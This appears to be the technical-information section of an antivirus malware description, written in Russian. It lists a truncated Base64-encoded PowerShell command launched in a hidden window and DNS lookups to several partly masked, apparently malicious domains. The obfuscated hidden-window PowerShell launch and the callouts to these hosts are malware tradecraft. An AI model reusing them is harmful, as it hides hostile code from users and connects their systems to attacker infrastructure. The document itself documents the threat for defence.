Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQgBnAHIAagBrAHIAbwBiAGkAaQB5AHAAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBNAGkAegBqAGQAcQBoAGcAIAAjAD4AIAAkAE8AdABwAGgAYwBvAGIAcwByAGsAPQAnAFkAawB1...
- DNS ASK yo####linempire.com
- DNS ASK up####ithali.com
- DNS ASK ta####techeap.com
- DNS ASK sa###gheran.com
- DNS ASK co#####otelliondor.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQgBnAHIAagBrAHIAbwBiAGkAaQB5AHAAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBNAGkAegBqAGQAcQBoAGcAIAAjAD4AIAAkAE8AdABwAGgAYwBvAGIAcwByAGsAPQAnAFkAawB1...' (со скрытым окном)